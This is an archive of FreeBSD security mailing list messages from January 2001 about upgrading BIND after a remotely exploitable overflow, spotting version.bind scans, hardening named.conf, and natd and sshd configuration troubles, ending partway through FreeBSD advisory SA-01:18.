to link against libwrap.

Otherwise... i dunno, use ipfw? :)

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."
From: Garrett Wollman
To: Gerald Pfeifer
Cc: freebsd-security@FreeBSD.ORG
Date: Tue, 30 Jan 2001 20:38:17 -0500 (EST)
Subject: nfsd lacks support for tcp_wrapper

<pfeifer@dbai.tuwien.ac.at> said:

> Or are we just missing something?

A good deal, since NFS has access-control at a higher level built in to the
kernel.  mountd will do the right magic to tell the kernel what your
access-control list is.  (Of course, if someone sniffs your mount-point file
handles you're still toast.)

-GAWollman

From: "Geoffrey T. Falk"
To: freebsd-security@FreeBSD.org
Date: Tue, 30 Jan 2001 18:42:50 -0700 (MST)
Subject: Re: nfsd lacks support for tcp_wrapper

On 31 Jan, Gerald Pfeifer wrote:
> Unless we completely missed something, nfsd does lack support for
> tcp_wrapper, doesn't it?
>
> As NFS is rather critical security-wise, this seems like a big omission.

IP filters are always better than TCP wrappers.  NFS should only be used
behind a good firewall anyways.  If you are paranoid about IP and DNS
spoofing on the local network, don't use plain NFS...

Geoffrey

From: Kris Kennaway
To: Rossen Raykov
Cc: ofsenfreebsd@yahoo.com, freebsd-security@FreeBSD.ORG
Date: Tue, 30 Jan 2001 18:40:34 -0800
Subject: Re: bind8.2.3 port

On Tue, Jan 30, 2001 at 02:30:38PM -0500, Rossen Raykov wrote:
> VERSION.BIND text = "8.2.3-REL"
> I hope this is not vulnerable.
> Can someone confirm that?

Yes, it's correct.  You're safe!

Kris

From: Kris Kennaway
To: Omer Faruk Sen
Cc: Rossen Raykov, freebsd-security@FreeBSD.ORG
Date: Tue, 30 Jan 2001 18:41:24 -0800
Subject: Re: bind8.2.3 port

On Tue, Jan 30, 2001 at 10:07:17AM -0800, Omer Faruk Sen wrote:
> You can download that port from www.freshports.org or
> www.freebsd.org/ports
> But I think there is a compilation problem with it.  I am not sure, but I
> have tried to compile that port 4 times with the same source code.  It has
> given me errors every time and all of them were in a different .c file.
> Weird, isn't it?  And after compiling it, I made a reboot but the sysctl
> command and some of my system commands started to give core dumps.  I am
> not sure the bind8.2.3 port is the reason for that; any feedback???

Sounds like a hardware or general system problem.  The port compiles fine,
but make sure you have removed any old bind-src.tar.gz and bind-doc.tar.gz
files from /usr/ports/distfiles since the new version has the same filenames
and you will get checksum errors which cause the build to abort.

Kris

From: Kris Kennaway
To: David La Croix
Cc: freebsd-security@FreeBSD.ORG
Date: Tue, 30 Jan 2001 18:42:16 -0800
Subject: Re: Bind: unapproved query (version.bind) Script kiddies?
On Tue, Jan 30, 2001 at 04:45:04PM -0600, David La Croix wrote:
> I just noticed the following in my logfiles: (/var/log/messages)
>
> it was running Bind 8.2.2-
>
> Jan 26 22:37:43 mildred named[41908]: unapproved query from [208.44.147.11].1584 for "version.bind"
> [repeat 23 more times from the same IP]

Yes, they're querying you for the version of BIND you're running.  Since
8.2.2 is vulnerable I suggest you update ASAP.
Kris

From: "Yuri A. Wolf"
To: freebsd-security@FreeBSD.ORG
Date: Wed, 31 Jan 2001 09:23:06 +0600 (NOVT)
Subject: bind8.2.3 - where is the correct place to download src?

Greetings.

I began to read and tried to make new bind8.2.3 from yesterday evening.  All
failed in different places...  This morning hasn't cleared the main thing
for me:

1) where is the correct place of the port for FreeBSD-3.4?

2) if I have fresh src from ftp.isc.org (actually isrv4.pa.vix.com, right?)
then can I compile it without using patches in the port collection?

and are there some changes about host ftp.FreeBSD.org?  today my nslookup
doesn't see it from here although I didn't make any changes...  can you tell
me the IP I can use instead?
--
Yuri

From: Kris Kennaway
To: "Yuri A. Wolf"
Cc: freebsd-security@FreeBSD.ORG
Date: Tue, 30 Jan 2001 19:27:54 -0800
Subject: Re: bind8.2.3 - where is the correct place to download src?

On Wed, Jan 31, 2001 at 09:23:06AM +0600, Yuri A. Wolf wrote:
> Greetings.
>
> I began to read and tried to make new bind8.2.3 from yesterday
> evening.  All failed in different places...  This morning hasn't cleared
> the main thing for me:
>
> 1) where is the correct place of the port for FreeBSD-3.4?

/usr/ports/net/bind8

> 2) if I have fresh src from ftp.isc.org (actually isrv4.pa.vix.com,
> right?) then can I compile it without using patches in the port collection?

It works, but if you don't use the port then you can't uninstall it, etc.

> and are there some changes about host ftp.FreeBSD.org?  today my nslookup
> doesn't see it from here although I didn't make any changes...  can you
> tell me the IP I can use instead?
xor# host ftp.freebsd.org
ftp.freebsd.org is a nickname for ftp.freesoftware.com
ftp.freesoftware.com has address 216.66.64.162

Kris

From: "Yuri A. Wolf"
To: freebsd-security@FreeBSD.org
Date: Wed, 31 Jan 2001 09:45:37 +0600 (NOVT)
Subject: Re: bind8.2.3 - where is the correct place to download src?

> > 1) where is the correct place of the port for FreeBSD-3.4?
>
> /usr/ports/net/bind8

;-) I meant the place at ftp.freebsd.org where the port is.  Yesterday I
downloaded the new port (with patches of course), but there was an error
during patching (patch-ac).  The sources were from ftp.isc.org, and I put
them into distfiles, so there wasn't a mistake, as I think...

> > 2) if I have fresh src from ftp.isc.org (actually isrv4.pa.vix.com,
> > right?) then can I compile it without using patches in the port collection?
> It works, but if you don't use the port then you can't uninstall it, etc.

So, if I do that, I don't need the patches located in ports, right?  Or?

> > and are there some changes about host ftp.FreeBSD.org?  today my nslookup
> > doesn't see it from here although I didn't make any changes...  can you
> > tell me the IP I can use instead?

> xor# host ftp.freebsd.org
> ftp.freebsd.org is a nickname for ftp.freesoftware.com
> ftp.freesoftware.com has address 216.66.64.162

Strange...  my named logs this:

Jan 31 08:54:10 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [207.90.181.81].53 'WHO2.CDROM.COM'
Jan 31 08:54:11 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [204.216.27.3].53 'WHO.CDROM.COM'
Jan 31 08:57:22 proxy named[37568]: ns_forw: query(ftp.freesoftware.com) All possible A RR's lame
Jan 31 09:04:51 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [204.216.27.3].53 'WHO.CDROM.COM'
Jan 31 09:04:52 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [207.90.181.81].53 'WHO2.CDROM.COM'
Jan 31 09:11:07 proxy named[37568]: ns_forw: query(ftp.freesoftware.com) All possible A RR's lame
Jan 31 09:23:36 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [207.90.181.81].53 'WHO2.CDROM.COM'
Jan 31 09:23:36 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [204.216.27.3].53 'WHO.CDROM.COM'

etc...
> Kris

--
Yuri

From: Kris Kennaway
To: "Yuri A. Wolf"
Cc: freebsd-security@FreeBSD.ORG
Date: Tue, 30 Jan 2001 19:53:09 -0800
Subject: Re: bind8.2.3 - where is the correct place to download src?

On Wed, Jan 31, 2001 at 09:45:37AM +0600, Yuri A. Wolf wrote:
> I meant the place at ftp.freebsd.org where the port is.  Yesterday I
> downloaded the new port (with patches of course), but there was an error
> during patching (patch-ac).  The sources were from ftp.isc.org, and I put
> them into distfiles, so there wasn't a mistake, as I think...

www.freebsd.org/ports - fairly obvious location, eh? :)

> > > 2) if I have fresh src from ftp.isc.org (actually isrv4.pa.vix.com,
> > > right?) then can I compile it without using patches in the port collection?
>
> > It works, but if you don't use the port then you can't uninstall it, etc.
>
> So, if I do that, I don't need the patches located in ports, right?  Or?

Patches in ports are typically used to work around inconsistencies with the
FreeBSD environment, to fix bugs and build errors.  In this case I don't
think the patches do much functionally; you can check for yourself.

Kris

From: Roger Marquis
To: security@FreeBSD.ORG
Date: Tue, 30 Jan 2001 19:56:13 -0800 (PST)
Subject: Re: Bind: unapproved query (version.bind) Script kiddies?

David La Croix wrote:
> It's not so much blocking queries to version.bind, so much as refusing to
> answer queries to an untrusted host, about domains it does not host.
Alternately, you could define the "allow-recursion" and "version" options:

    options {
            directory "/etc/namedb";
            version "none.of.your.business";
            pid-file "/var/run/named.pid";
            listen-on { localhost; YOUR_IP; };
            query-source address YOUR_IP port 53;
            transfer-source YOUR_IP;
            allow-recursion { localhost; YOUR_SUBNET; };
    };

--
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

>     options {
>             directory "/etc/namedb";
>             allow-query {
>                     127.0.0.1;
>                     localnets;
>             };
>             allow-transfer {
>                     0.0.0.0;        /* IPs changed */
>                     0.0.0.0;        /* secondary DNS servers */
>             };
>             forwarders {
>                     0.0.0.0; 0.0.0.0;
>             };
>     };
>
> and then further down all my zone definitions look like:
>
>     zone "mydomain.com" {
>             type master;
>             file "zones/mydomain.com";
>             allow-query { any; };
>     };

From: "Dan Langille"
Organization: novice in training
To: "Dan Langille"
Cc: security@FreeBSD.ORG
Reply-To: dan@langille.org
Date: Wed, 31 Jan 2001 16:59:21 +1300
Subject: bind 9.1.0 (was Re: bind8.2.3 and installation problem)

On 31 Jan 2001, at 8:55, Dan Langille wrote:

> Thanks.
> For those that want to know, and I know you're out there:
>
>     make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb
>     DESTEXEC=/usr/libexec DESTRUN=/var/run DESTSBIN=/usr/sbin
>     DESTHELP=/usr/share/misc install
>
> I didn't use any of the other options...
>
> After the install, the /etc/named.conf symlink was no longer needed.
> ndc reload seems to be fine.  I'll do some more testing later (there's not
> actually any zones loaded on this box).

After hearing claims that 9.1.0 was harder to configure and then hearing it
was quite straightforward, I decided to try this myself.  Using the above
make command for bind9, I tried the latest and greatest.  It compiled
cleanly, but it looks for named.conf in a place I hadn't considered:
/usr/etc/named.conf.  What option did I miss?

After "/usr/sbin/named -u bind", this was found in /var/log/messages:

    starting BIND 9.1.0 -u bind
    /usr/etc/named.conf: open: file not found
    loading configuration: file not found
    exiting (due to fatal error)

Also of note: the -g option is gone in 9.

--
Dan Langille
pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php

From: "Yuri A. Wolf"
To: freebsd-security@FreeBSD.org
Date: Wed, 31 Jan 2001 10:08:58 +0600 (NOVT)
Subject: Re: bind8.2.3 - where is the correct place to download src?
On Tue, 30 Jan 2001, Kris Kennaway wrote:
> On Wed, Jan 31, 2001 at 09:45:37AM +0600, Yuri A. Wolf wrote:
>
> > I meant the place at ftp.freebsd.org where the port is.  Yesterday I
> > downloaded the new port (with patches of course), but there was an error
> > during patching (patch-ac).  The sources were from ftp.isc.org, and I put
> > them into distfiles, so there wasn't a mistake, as I think...
>
> www.freebsd.org/ports - fairly obvious location, eh? :)

Yeah, I know that, I was there hundreds of times...

Actually I just checked: there is bind-8.2.2.p7 in the title at
http://www.FreeBSD.org/ports/net.html and links to 8.2.3 on ftp.isc.org.

That's why I asked.

Well, I'll try to download and make the port again...  but I'm not sure
changes were made...

And in any case something strange: I can't nslookup ftp.FreeBSD.org...
freefall, mx1 etc. all nslookup the right way, and yesterday there wasn't a
problem with it...  a sort of attack or paranoia?
> Kris

From owner-freebsd-security Tue Jan 30 20:10:08 2001
Date: Tue, 30 Jan 2001 23:08:25 -0500
From: Steve Ames
To: Dan Langille
Cc: security@FreeBSD.ORG
Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem)
Message-ID: <20010130230825.A62054@virtual-voodoo.com>
References: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> <200101301955.IAA67144@ducky.nz.freebsd.org> <200101310359.QAA69612@ducky.nz.freebsd.org>
In-Reply-To: <200101310359.QAA69612@ducky.nz.freebsd.org>; from dan@langille.org on Wed, Jan 31, 2001 at 04:59:21PM +1300

On Wed, Jan 31, 2001 at 04:59:21PM +1300, Dan Langille wrote:
> starting BIND 9.1.0 -u bind
> /usr/etc/named.conf: open: file not found
> loading configuration: file not found
> exiting (due to fatal error)

If you load BIND 9.1.0 straight out of /usr/ports/net/bind9 it seems
to want /usr/local/etc/named.conf ... that makes some sense.

/usr/etc is just shady :)

>
> Also of note: the -g option is gone in 9.

-g does something else now... very confusing.

Lastly... is this really a -security topic? Perhaps -isp or -questions
is more appropriate?
-Steve

>
> --
> Dan Langille
> pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php

From owner-freebsd-security Tue Jan 30 21:17:49 2001
Date: Wed, 31 Jan 2001 11:17:15 +0600 (NOVT)
From: "Yuri A. Wolf"
To: freebsd-security@FreeBSD.ORG
Subject: It works! ;-) (Was: Re: bind8.2.3 - where is the correct place to download src?)

> Actually I just checked there is bind-8.2.2.p7 in the title at
> http://www.FreeBSD.org/ports/net.html and links to 8.2.3 on ftp.isc.org
>
> That's why I asked.
> Well, I'll try to download and make the port again... but I'm not sure the
> changes were made...

They were made ;-))) I just repeated the procedure I did yesterday, and
all works - there wasn't any error!

Thanks guys!
;-))

--
Yuri

From owner-freebsd-security Tue Jan 30 21:18:24 2001
Date: Tue, 30 Jan 2001 21:17:53 -0800
From: "Crist J. Clark"
To: Mason Harding
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Revised: My FreeBSD Firewall
Message-ID: <20010130211753.N91447@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
References: <980823154.3a762c72329fd@mail.marketnews.com>
In-Reply-To: ; from mharding@marketnews.com on Tue, Jan 30, 2001 at 08:14:23AM -0800

On Tue, Jan 30, 2001 at 08:14:23AM -0800, Mason Harding wrote:
> I am now just trying to implement a FreeBSD firewall, say with the IP
> address of 172.16.5.2, with the router being 172.16.5.1, and the network
> being 172.16.5.0/24. How can I handle the routing on this? My routing
> table is basically as such...
>
> Destination        Gateway            Netif
> default            172.16.5.1         fxp0
> 172.15.5           link#1             fxp1
> 172.16.5.1         0:0:c:80:f:30      fxp0
> 172.15.5.2/32      link#1             fxp0
>
> I can ping 172.16.5.1 with success, but if I try to ping anything past it (on
> the internet) I get no response. I can also ping anything on the LAN. Am I
> going about implementing this firewall correctly?
> Should I not just be
> adding a static route for 172.16.5.1? Sorry if this made no sense.

You want to do bridging, not routing, if you do this, since you want to
have the same network on both sides of the firewall. However, you are
probably better off changing the IP address of the router and the
external interface of the firewall to RFC1918 numbers and then having
172.16.5.0/24 on the internal network. You can then do routing to move
the traffic.

--
Crist J. Clark                                cjclark@alum.mit.edu

From owner-freebsd-security Tue Jan 30 22:20:24 2001
Message-ID: <006501c08b4d$0dbbad80$019be8d8@nasty>
From: "Craig Skelton"
To: "Steve Ames", "Dan Langille"
References: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> <200101301955.IAA67144@ducky.nz.freebsd.org> <200101310359.QAA69612@ducky.nz.freebsd.org> <20010130230825.A62054@virtual-voodoo.com>
Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem)
Date: Tue, 30 Jan 2001 22:14:16 -0800
http://www.cert.org/advisories/CA-2001-02.html

yup.

----- Original Message -----
From: "Steve Ames"
To: "Dan Langille"
Sent: Tuesday, January 30, 2001 8:08 PM
Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem)

> On Wed, Jan 31, 2001 at 04:59:21PM +1300, Dan Langille wrote:
> > starting BIND 9.1.0 -u bind
> > /usr/etc/named.conf: open: file not found
> > loading configuration: file not found
> > exiting (due to fatal error)
>
> If you load BIND 9.1.0 straight out of /usr/ports/net/bind9 it seems
> to want /usr/local/etc/named.conf ... that makes some sense.
>
> /usr/etc is just shady :)
>
> >
> > Also of note: the -g option is gone in 9.
>
> -g does something else now... very confusing.
>
> Lastly... is this really a -security topic? Perhaps -isp or -questions
> is more appropriate?
>
> -Steve
>
> >
> > --
> > Dan Langille
> > pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php

From owner-freebsd-security Wed Jan 31 00:43:04 2001
From: "Rodney W. Grimes"
Message-Id: <200101310842.AAA17048@gndrsh.dnsmgr.net>
Subject: Re: Bind: unapproved query (version.bind) Script kiddies?
In-Reply-To: <200101302245.RAA12443@cowpie.acm.vt.edu> from David La Croix at "Jan 30, 2001 04:45:04 pm"
To: dlacroix@cowpie.acm.vt.edu (David La Croix)
Date: Wed, 31 Jan 2001 00:42:34 -0800 (PST)
Cc: freebsd-security@FreeBSD.ORG

Given I just saw 208.44.147.11 pile up in my logfiles I can say we have
an active script kiddy. He is searching for broken named's and hitting
large areas of IP space (this is just one burst in my logs):

/var/log/security.0.gz:Jan 30 07:45:46 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3120 X.X.X.0:53 in via ng0
/var/log/security.0.gz:Jan 30 07:45:46 br1 /kernel: ipfw: 10532 Accept TCP 208.44.147.11:3124 X.X.X.4:53 in via ng0
/var/log/security.0.gz:Jan 30 07:45:48 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3501 X.X.X.127:53 in via ng0
/var/log/security.0.gz:Jan 30 07:45:48 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3584 X.X.X.159:53 in via ng0
/var/log/security.0.gz:Jan 30 07:45:48 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3585 X.X.X.160:53 in via ng0
/var/log/security.0.gz:Jan 30 07:45:49 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3717 X.X.X.191:53 in via ng0
/var/log/security.0.gz:Jan 30 07:45:49 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3718 X.X.X.192:53 in via ng0
/var/log/security.0.gz:Jan 30 07:45:49 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3901 X.X.X.223:53 in via ng0
/var/log/security.0.gz:Jan 30 07:45:49 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3902 X.X.X.224:53 in via ng0

> I just noticed the following in my logfiles: (/var/log/messages)
>
> it was running Bind 8.2.2-
>
> Jan 26 22:37:43 mildred named[41908]: unapproved query from [208.44.147.11].1584 for "version.bind"
> [repeat 23 more times from the same IP]
>
> Jan 27 01:44:42 mildred named[41908]: unapproved query from
> [208.139.163.15].2734 for "version.bind"
> [repeat 32 more times from the same IP]
>
> Could this be script kiddie activity? This was before I upgraded to 8.2.3,
> and before the CERT alert came out.
>
> What I don't get is why the unapproved query repeated so many times, within
> (according to the timestamp) 3 seconds on both occasions.
>
> I will note: this activity goes back through about November of 2000,
> seemingly from different IP addresses.

--
Rod Grimes - KD7CAX @ CN85sl - (RWG25)                rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Wed Jan 31 02:23:30 2001
X-URL: http://www.ofug.org/~des/
To: chet@po.cwru.edu
Cc: roam@orbitel.bg, patrick@netzuno.com, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Bash2 removes SSH_CLIENT from the environment
References: <1010130150609.AA70020.SM@nike.INS.CWRU.Edu>
From: Dag-Erling Smorgrav
Date: 31 Jan 2001 11:23:04 +0100
In-Reply-To: Chet Ramey's message of "Tue, 30 Jan 2001 10:06:09 -0500"

Chet Ramey writes:
> Bash uses the presence of SSH_CLIENT to decide whether or not to run the
> shell startup files for a non-interactive shell (like it attempts to do
> for rsh).
[...]

Feh. Here's a nickel, kid, get yourself a real shell.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Wed Jan 31 02:25:27 2001
X-URL: http://www.ofug.org/~des/
To: "Craig Skelton"
Cc: "Steve Ames", "Dan Langille"
Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem)
References: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> <200101301955.IAA67144@ducky.nz.freebsd.org> <200101310359.QAA69612@ducky.nz.freebsd.org> <20010130230825.A62054@virtual-voodoo.com> <006501c08b4d$0dbbad80$019be8d8@nasty>
From: Dag-Erling Smorgrav
Date: 31 Jan 2001 11:25:02 +0100
In-Reply-To: "Craig Skelton"'s message of "Tue, 30 Jan 2001 22:14:16 -0800"

"Craig Skelton" writes:
> > Lastly... is this really a -security topic? Perhaps -isp or -questions
> > is more appropriate?
> http://www.cert.org/advisories/CA-2001-02.html

Yes, "multiple vulnerabilities in BIND" is a security topic, but "how
to install and configure BIND 9" is not.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Wed Jan 31 02:25:49 2001
Date: Wed, 31 Jan 2001 02:25:26 -0800
From: Gregory Sutter
To: Ade Lovett
Cc: Rasputin, freebsd-security@freebsd.org, imp@village.org
Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch)
Message-ID: <20010131022526.B656@klapaucius.zer0.org>
References: <20010124230626.A49802@citusc17.usc.edu> <20010125103255.A78404@FreeBSD.org> <200101262153.f0QLrLL40016@earth.backplane.com> <20010129095752.A37233@dogma.freebsd-uk.eu.org>
	<20010129101411.A16899@FreeBSD.org>
In-Reply-To: <20010129101411.A16899@FreeBSD.org>; from ade@FreeBSD.org on Mon, Jan 29, 2001 at 10:14:11AM -0600
Organization: Zer0

On 2001-01-29 10:14 -0600, Ade Lovett wrote:
> On Mon, Jan 29, 2001 at 09:57:53AM +0000, Rasputin wrote:
> > Killing off sshd obviously makes remote admin a real problem, though;
> > is there another way to guarantee we'd notice?
>
> If it's not going to be backed out (a serious mistake, IMO), then
> UPDATING needs to be modified at least:
>
> 200101xx
>         The 'ConnectionsPerPeriod' directive in /etc/ssh/sshd_config
>         has been deprecated. Please ensure that you either comment
>         out, or preferably remove, this entry BEFORE REBOOTING.
>         /usr/sbin/sshd after this date WILL NOT RUN with this directive
>         in place, which is likely to cause substantial issues for
>         headless machines.

If it's deprecated, it's deprecated, and people shouldn't use it.
That's not what's been done, though. The support for it has been
removed, and in a sudden, unannounced, and poorly-implemented fashion.
Either back this out or repair it so that sshd issues a warning and
continues running. This is absolutely pointless breakage in a product
that's supposed to be _stable_.

Only the fact that I happened to be particularly fastidious in my
mergemastering saved me from having to borrow a car and drive to my
servers. It would have pissed me off even more otherwise.

Greg
--
Gregory S. Sutter                      Bureaucrats cut red tape--lengthwise.
mailto:gsutter@zer0.org                http://www.zer0.org/~gsutter/
hkp://wwwkeys.pgp.net/0x845DFEDD

From owner-freebsd-security Wed Jan 31 06:56:22 2001
Message-ID: <01fd01c08b95$c0f45580$019be8d8@nasty>
From: "Craig Skelton"
To: "Dag-Erling Smorgrav"
Cc: "Steve Ames", "Dan Langille"
References: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> <200101301955.IAA67144@ducky.nz.freebsd.org> <200101310359.QAA69612@ducky.nz.freebsd.org> <20010130230825.A62054@virtual-voodoo.com> <006501c08b4d$0dbbad80$019be8d8@nasty>
Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem)
Date: Wed, 31 Jan 2001 06:54:27 -0800

Twice? Grin.

Has anybody seen exploits in the wild for these vulnerabilities?
I'd love to try them out :)

Cheers,
Craig

----- Original Message -----
From: "Dag-Erling Smorgrav"
To: "Craig Skelton"
Cc: "Steve Ames"; "Dan Langille"
Sent: Wednesday, January 31, 2001 2:25 AM
Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem)

> "Craig Skelton" writes:
> > > Lastly... is this really a -security topic? Perhaps -isp or -questions
> > > is more appropriate?
> > http://www.cert.org/advisories/CA-2001-02.html
>
> Yes, "multiple vulnerabilities in BIND" is a security topic, but "how
> to install and configure BIND 9" is not.
>
> DES
> --
> Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Wed Jan 31 10:06:01 2001
Date: Wed, 31 Jan 2001 12:05:41 -0600 (CST)
From: Nate Dannenberg
To: freebsd-security@freebsd.org
Subject: NATD insecure / DoS?

Something I ran into today, which I think warrants a little checking into.

I have NATD set up and running a simple divert mechanism (with the kernel's
help of course) for another computer on this machine's RS232 port.
That other computer isn't what this message is about, however.

The IP address of this machine (which runs 4.2-Release), which is normally
more or less static, changed yesterday. When that happened, I ended up
without any Internet connectivity, and I think it was NATD's fault:
ifconfig -a showed that I had an IP address (the new one), and dhclient
was able to get the information it needs from the DHCP server without
problems, but all other attempts to go out on the network failed (telnet,
ping, www, napster, etc), and netstat -r refused to come up with any
routing information.

My only solution (before I realized the possible problem) was to shut down
and reboot the computer. On checking /var/log/messages, I saw a few of
the usual DHCP requests, all of which looked normal, except for one in
which my IP address had changed. It was at that point that I lost
connectivity.

Does anyone else have this problem with NATD? Is there a solution?

--
natedac@kscable.com
http://home.kscable.com/natedac
C64/C128 - What's *YOUR* hobby?
From owner-freebsd-security Wed Jan 31 10:20:42 2001
Date: Wed, 31 Jan 2001 12:20:17 -0600 (CST)
From: Nate Dannenberg
To: freebsd-security@FreeBSD.ORG
Subject: Re: NATD insecure / DoS?

> My only solution (before I realized the possible problem) was to shut down
> and reboot the computer. On checking /var/log/messages, I saw a few of
> the usual DHCP requests, all of which looked normal, except for one in
> which my IP address had changed. It was at that point that I lost
> connectivity.
>
> Does anyone else have this problem with NATD? Is there a solution?

What I forgot to mention is that before I rebooted, I checked things out
with tcpdump, which showed a lot of activity from my previous IP address,
even though attempts to reach that address, either from this box in
question or another person's machine located 20 miles away (I phoned
him), by any method (ping, telnet, ftp) failed.
That person also tried reaching my machine by the IP address ifconfig said
I had, and he received no data back once connected either by FTP or telnet;
however, he was getting responses to PING requests.

Did NATD take a dive when my IP address changed?

--
natedac@kscable.com
http://home.kscable.com/natedac
C64/C128 - What's *YOUR* hobby?

From owner-freebsd-security Wed Jan 31 10:22:29 2001
Date: Wed, 31 Jan 2001 19:22:03 +0100
To: freebsd-security@freebsd.org
Subject: Re: NATD insecure / DoS?
Message-ID: <20010131192203.A1959@crow.dom2ip.de>
Mail-Followup-To: tmoestl@gmx.net, freebsd-security@freebsd.org
In-Reply-To: ; from natedac@kscable.com on Wed, Jan 31, 2001 at 12:05:41PM -0600
From: Thomas Moestl

On Wed, Jan 31, 2001 at 12:05:41PM -0600, Nate Dannenberg wrote:
> The IP address of this machine (which runs 4.2-Release), which is normally
> more or less static, changed yesterday.
> When that happened, I ended up
> without any Internet connectivity, and I think it was NATD's fault:

Are you running natd with the -dynamic option? If not, check natd(8).

	- thomas

From owner-freebsd-security Wed Jan 31 11:19:38 2001
Date: Wed, 31 Jan 2001 20:19:14 +0100 (CET)
From: Joshua Goodall
Subject: upgrading bind from cvsup'd tree

Time being precious, I executed the following on a recently cvsup'd source
tree:

cd /usr/src/lib/libbind/
make && make install
cd /usr/src/lib/libisc/
make && make install
cd /usr/src/usr.sbin/named/
make && make install

I'm asking the eyes on this list (Kris?) to confirm that this is a
sufficient way to rebuild all vulnerable parts - be they libraries or
core code or whatever - pending the completion of a complete
{build&&install}world.

n.b.

$ nslookup -q=txt -class=CHAOS version.bind. 127.0.0.1
Server:  localhost
Address:  127.0.0.1

VERSION.BIND    text = "8.2.3-REL"
$

so it *smells* good. I'm checking that it's properly cooked.

TIA

joshua

--
Joshua Goodall
A friend of mine works for a medium-sized telco.
He has no phone, because (and I quote) "the lady who provisions phones is
on holiday"

From owner-freebsd-security Wed Jan 31 13:24:03 2001
Date: Wed, 31 Jan 2001 13:23:21 -0800 (PST)
Message-Id: <200101312123.f0VLNL134920@freefall.freebsd.org>
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Reply-To: security-advisories@FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:18                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          BIND remotely exploitable buffer overflow

Category:       core, ports
Module:         bind
Announced:      2001-01-31
Credits:        COVERT Labs
                Claudio Musmarra
Affects:        All released versions of FreeBSD 3.x, 4.x.
                FreeBSD 3.5-STABLE prior to the correction date.
                FreeBSD 4.2-STABLE prior to the correction date.
                Ports collection prior to the correction date.
Corrected:      2001-01-30 (FreeBSD 3.5-STABLE)
                2001-01-29 (FreeBSD 4.2-STABLE)
                2001-01-29 (Ports collection)
Vendor status:  Updated version released
FreeBSD only:   NO

I.   Background

BIND is an implementation of the Domain Name Service (DNS) protocols.

II.
Problem Description

An overflowable buffer related to the processing of transaction
signatures (TSIG) exists in all versions of BIND prior to 8.2.3-RELEASE.
The vulnerability is exploitable regardless of configuration options and
affects both recursive and non-recursive DNS servers.

Additional vulnerabilities allow the leaking of environment variables and
the contents of the program stack. These vulnerabilities may assist the
ability of attackers to exploit the primary vulnerability described above,
and may provide additional information about the state or configuration
of the system.

All previous versions of BIND 8, such as the beta versions included in
FreeBSD 4.x prior to the correction date (designated the version number
BIND 8.2.3-T<#>B) are vulnerable to this problem. Systems running versions
of BIND 9.x (available in the FreeBSD ports collection) are unaffected.

Further information about the vulnerabilities is contained in the CERT
advisory located at:

http://www.cert.org/advisories/CA-2001-02.html

Note that this advisory also describes vulnerabilities in the BIND 4.x
software, which is not included in any recent version of FreeBSD.

All versions of FreeBSD 3.x and 4.x prior to the correction date including
3.5.1-RELEASE and 4.2-RELEASE are vulnerable to this problem, if they have
been configured to run named (this is not enabled by default). In addition,
the bind8 port in the ports collection (versions prior to 8.2.3) is also
vulnerable.

To check whether a DNS server is running a vulnerable version of BIND,
perform the following command as any user:

% dig @serverip version.bind. CHAOS TXT

The following segment of output indicates a non-vulnerable server running
BIND 8.2.3-RELEASE:

...
;; ANSWER SECTION:
VERSION.BIND.           0S CHAOS TXT    "8.2.3-REL"
...

III. Impact

Malicious remote users can cause arbitrary code to be executed as the user
running the named daemon.
This is often the root user, although FreeBSD provides built-in support for
the execution of named as an unprivileged 'bind' user, which greatly limits
the scope of the vulnerability should a successful penetration take place.

IV.  Workaround

There is no known practical workaround to prevent the vulnerability from
being exploited, short of upgrading the software.

A partial workaround to limit the impact of the vulnerability should it be
exploited is to run named as an unprivileged user. Add the following line
to /etc/rc.conf:

named_flags="-u bind -g bind"   # Flags for named

Add the following line to your /etc/namedb/named.conf file, in the
"options" section:

pid-file "/var/named/named.pid";

